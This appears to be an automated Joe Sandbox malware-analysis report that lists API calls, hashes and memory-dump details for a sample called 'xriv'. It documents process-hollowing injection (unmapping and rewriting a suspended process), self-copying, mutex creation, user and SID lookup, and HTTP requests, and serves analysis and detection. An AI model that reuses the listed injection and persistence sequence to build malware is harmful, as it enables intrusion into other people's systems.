                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CurrentDirectorySleep
                                                                      • String ID: runas
                                                                      • API String ID: 16921501-4000483414
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (first node 334: 11da032-11da034)
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 011DA04D
                                                                      • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 011DA068
                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 011DA1A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$AttributesCopyCreateDirectory
                                                                      • String ID:
                                                                      • API String ID: 210682061-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (first node 389: 11d9d04-11d9d13)
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 011D9EB5
                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 011DA1A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CopyModuleName
                                                                      • String ID:
                                                                      • API String ID: 4108865673-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (first node 505: 11ec59c-11ec5b2)
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (first node 537: 11f4d8f-11f4d9a)
                                                                      APIs
                                                                      • _free.LIBCMT ref: 011F4DB0
                                                                        • Part of subcall function 011EDB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,011E8272,?,?,?,?,?,011D20C3,?,?), ref: 011EDB6E
                                                                      • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,011F0E8A,?,00000004,00000002,?,?,?,011EC625,?,00000002), ref: 011F4DEC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap$_free
                                                                      • String ID:
                                                                      • API String ID: 1482568997-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (first node 560: 11e5e20-11e5e3c)
                                                                      APIs
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 011E5F53
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task
                                                                      • String ID:
                                                                      • API String ID: 118556049-0
                                                                      • Opcode ID: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                      • Instruction ID: fa49e8b60cd02adb4ea2594d3b29e8e995cb1f899d61d01e5401b585069e7987
                                                                      • Opcode Fuzzy Hash: 99a60c00e11d80a0fe42efdd695636690d312d340402f51b068320ab2a9b3208
                                                                      • Instruction Fuzzy Hash: 5D312875700A009BD72C9EFC988856EFBEAEF55228B14437EE925C7381DB709D448792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 011D218E
                                                                        • Part of subcall function 011E8483: RaiseException.KERNEL32(E06D7363,00000001,00000003,011D216C,?,?,?,011D216C,?,01206D1C), ref: 011E84E3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                      • String ID:
                                                                      • API String ID: 3109751735-0
                                                                      • Opcode ID: ec5fab1d3333aac8503318a2db848b0c8d933b19d294be03a9c66e73158c2b52
                                                                      • Instruction ID: 00a9d9cd189fea6b3dbbcd03d6f00cd2c9c9c081a802aab7b409010de99b0489
                                                                      • Opcode Fuzzy Hash: ec5fab1d3333aac8503318a2db848b0c8d933b19d294be03a9c66e73158c2b52
                                                                      • Instruction Fuzzy Hash: 3401D675810A0E77DB1CFAE8EC0899DBBECDE10118B508629FB14A6590FB70EA54C6D2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: f4b1fd8fa4d268923be55267a6ebfd6a0f2946132b5fd3696a916a9b9eccb385
                                                                      • Instruction ID: 75d55cff6ba111557c4582d6548827b56301a06493c951e32bc2fece7b20b65a
                                                                      • Opcode Fuzzy Hash: f4b1fd8fa4d268923be55267a6ebfd6a0f2946132b5fd3696a916a9b9eccb385
                                                                      • Instruction Fuzzy Hash: 83111871A0420AAFCF09DF98E94599B7BF4EF48318F054059F809AB251E770EA11CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 011EF925: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,011EE0E6,00000001,00000364,00000006,000000FF,?,?,011E8272,?), ref: 011EF966
                                                                      • _free.LIBCMT ref: 011EEDC5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                      • Instruction ID: dfc452f240516c4d81445353a59317be7de53271ffa022d858bdb39afdb3a2b8
                                                                      • Opcode Fuzzy Hash: bbfaf170cd2aa4a5dd4654b786cba334a1d7a93fa1ef5963fa5f0812df2330b2
                                                                      • Instruction Fuzzy Hash: 1E014972604717ABC3298FDDD88899EFFD8FB053B0F01062AE559A76C0E7706810CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                      • Instruction ID: 7299486a8485b1bafe2ea825b7fe613660c8bc5449eea7e187596ffbee2c514c
                                                                      • Opcode Fuzzy Hash: 6d7cabbe3305cb9b6d011bf0e9d56addc9b4860a8407226052aa3c61f76cc774
                                                                      • Instruction Fuzzy Hash: 9B012C72C0115AAFCF05AFE89C05AEE7FB5BF18214F144569AE14A2160E7328A60DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,011EE0E6,00000001,00000364,00000006,000000FF,?,?,011E8272,?), ref: 011EF966
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 29e1b6ffda2b588abb048351bb30277c14021b4c3584210445035c9cb70dd7f7
                                                                      • Instruction ID: d97b6aca2f8c8e7aa6f8ac8925a5c080dfe4602d7866324543c2f2e6ca6352bb
                                                                      • Opcode Fuzzy Hash: 29e1b6ffda2b588abb048351bb30277c14021b4c3584210445035c9cb70dd7f7
                                                                      • Instruction Fuzzy Hash: E2F02431605E2776AB2E1AFA8C0CB5B3BC8AF512B4B058111BD94971C0EB20D80287F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,011E8272,?,?,?,?,?,011D20C3,?,?), ref: 011EDB6E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 912b65e068649dc22c0f8808a90a12ca128436f368c54ee9542488de2f34a426
                                                                      • Instruction ID: 2c7aaa35fc47a1ec527cb2d1f4633bfc8a3d586abf554169cd0f6eb086a1e67e
                                                                      • Opcode Fuzzy Hash: 912b65e068649dc22c0f8808a90a12ca128436f368c54ee9542488de2f34a426
                                                                      • Instruction Fuzzy Hash: 76E06C35545E1167EE3D15E97C0DB5B7AD9AB532B5F0A0114ED15971C4EB10C44082E5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,011F2758,?,?,00000000,?,011F2758,00000000,0000000C), ref: 011F2385
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 950ca8c887abc5aaa3508e3024c06274d67f2588423288dc843e103504f7b89d
                                                                      • Instruction ID: dd081eea39a2c1684c4bea2effc64ecf9f2ae51994a0bf48a0eaec3244ead512
                                                                      • Opcode Fuzzy Hash: 950ca8c887abc5aaa3508e3024c06274d67f2588423288dc843e103504f7b89d
                                                                      • Instruction Fuzzy Hash: 19D06C3200010DBBDF128E85DD46EDA3FAAFB48714F014010BA1856020C732E871EB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 011D38E6
                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 011D394B
                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 011D3964
                                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 011D397F
                                                                      • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 011D39A3
                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 011D39BE
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 011D39C5
                                                                      • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 011D39ED
                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 011D3A0E
                                                                      • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 011D3A5A
                                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 011D3A96
                                                                      • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 011D3AB2
                                                                      • ResumeThread.KERNEL32(?,?,?,00000000), ref: 011D3ABE
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 011D3ACC
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 011D3AED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                      • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                      • API String ID: 4033543172-1522589568
                                                                      • Opcode ID: 651151569e1297f776b6b97f72158d04800098ec9a7528ff0c824d6bbbd45d38
                                                                      • Instruction ID: 5211f317e0f1b7042b30d5179bf1a2238a6d97709ea6ebba16d2b2587766b244
                                                                      • Opcode Fuzzy Hash: 651151569e1297f776b6b97f72158d04800098ec9a7528ff0c824d6bbbd45d38
                                                                      • Instruction Fuzzy Hash: 43B1D571A00618EFEB29CF68DC49BEABBB5FF48714F100269F615A62D0D771A980CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(00000000,00000000,?,0120918C,9BC7B195,?,00000000,00000000), ref: 011D7F61
                                                                      • GetLastError.KERNEL32(?,00000000,00000000), ref: 011D7F67
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateErrorLastMutex
                                                                      • String ID:
                                                                      • API String ID: 1925916568-0
                                                                      • Opcode ID: 87c8ef8af8138801b9137551380ae0f96f91a8dcb0000223eac7e9a0e22f347e
                                                                      • Instruction ID: b1d3895078de0b52cd74d695d71ee99f2379f4dab72423291a50e5901374d681
                                                                      • Opcode Fuzzy Hash: 87c8ef8af8138801b9137551380ae0f96f91a8dcb0000223eac7e9a0e22f347e
                                                                      • Instruction Fuzzy Hash: DF225771A001089FEB1CDFA8CC88BDEBBB6EF55318F54426CE515A72D5DB349A80CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 597776487-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 011E7B12
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor
                                                                      • String ID:
                                                                      • API String ID: 2325560087-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 011D3132
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 011D3147
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 011D314A
                                                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 011D3158
                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 011D317B
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 011D3186
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 011D3189
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 011D3199
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 011D319C
                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 011D31C6
                                                                      • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 011D31D9
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 011D32D5
                                                                      • HeapFree.KERNEL32(00000000), ref: 011D32DE
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011D32E3
                                                                      • HeapFree.KERNEL32(00000000), ref: 011D32E6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011D32ED
                                                                      • HeapFree.KERNEL32(00000000), ref: 011D32F0
                                                                      • LocalFree.KERNEL32(00000000), ref: 011D32F5
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                      • String ID:
                                                                      • API String ID: 3326663573-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 011F1705
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F12BB
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F12CD
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F12DF
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F12F1
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1303
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1315
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1327
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1339
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F134B
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F135D
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F136F
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1381
                                                                        • Part of subcall function 011F129E: _free.LIBCMT ref: 011F1393
                                                                      • _free.LIBCMT ref: 011F16FA
                                                                        • Part of subcall function 011ED653: HeapFree.KERNEL32(00000000,00000000,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?), ref: 011ED669
                                                                        • Part of subcall function 011ED653: GetLastError.KERNEL32(?,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?,?), ref: 011ED67B
                                                                      • _free.LIBCMT ref: 011F171C
                                                                      • _free.LIBCMT ref: 011F1731
                                                                      • _free.LIBCMT ref: 011F173C
                                                                      • _free.LIBCMT ref: 011F175E
                                                                      • _free.LIBCMT ref: 011F1771
                                                                      • _free.LIBCMT ref: 011F177F
                                                                      • _free.LIBCMT ref: 011F178A
                                                                      • _free.LIBCMT ref: 011F17C2
                                                                      • _free.LIBCMT ref: 011F17C9
                                                                      • _free.LIBCMT ref: 011F17E6
                                                                      • _free.LIBCMT ref: 011F17FE
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 011E8CC2
                                                                      • type_info::operator==.LIBVCRUNTIME ref: 011E8CE9
                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 011E8DF5
                                                                      • CatchIt.LIBVCRUNTIME ref: 011E8E4A
                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 011E8ED0
                                                                      • _UnwindNestedFrames.LIBCMT ref: 011E8F57
                                                                      • CallUnexpected.LIBVCRUNTIME ref: 011E8F72
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 4234981820-393685449
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 011EDE42
                                                                        • Part of subcall function 011ED653: HeapFree.KERNEL32(00000000,00000000,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?), ref: 011ED669
                                                                        • Part of subcall function 011ED653: GetLastError.KERNEL32(?,?,011F142F,?,00000000,?,?,?,011F1456,?,00000007,?,?,011F1858,?,?), ref: 011ED67B
                                                                      • _free.LIBCMT ref: 011EDE4E
                                                                      • _free.LIBCMT ref: 011EDE59
                                                                      • _free.LIBCMT ref: 011EDE64
                                                                      • _free.LIBCMT ref: 011EDE6F
                                                                      • _free.LIBCMT ref: 011EDE7A
                                                                      • _free.LIBCMT ref: 011EDE85
                                                                      • _free.LIBCMT ref: 011EDE90
                                                                      • _free.LIBCMT ref: 011EDE9B
                                                                      • _free.LIBCMT ref: 011EDEA9
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InternetOpenW.WININET(01203F6C,00000000,00000000,00000000,00000000), ref: 011D871C
                                                                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 011D8740
                                                                      • HttpOpenRequestA.WININET(?,00000000), ref: 011D878A
                                                                      • HttpSendRequestA.WININET(?,00000000), ref: 011D884A
                                                                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 011D88FC
                                                                      • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 011D89B0
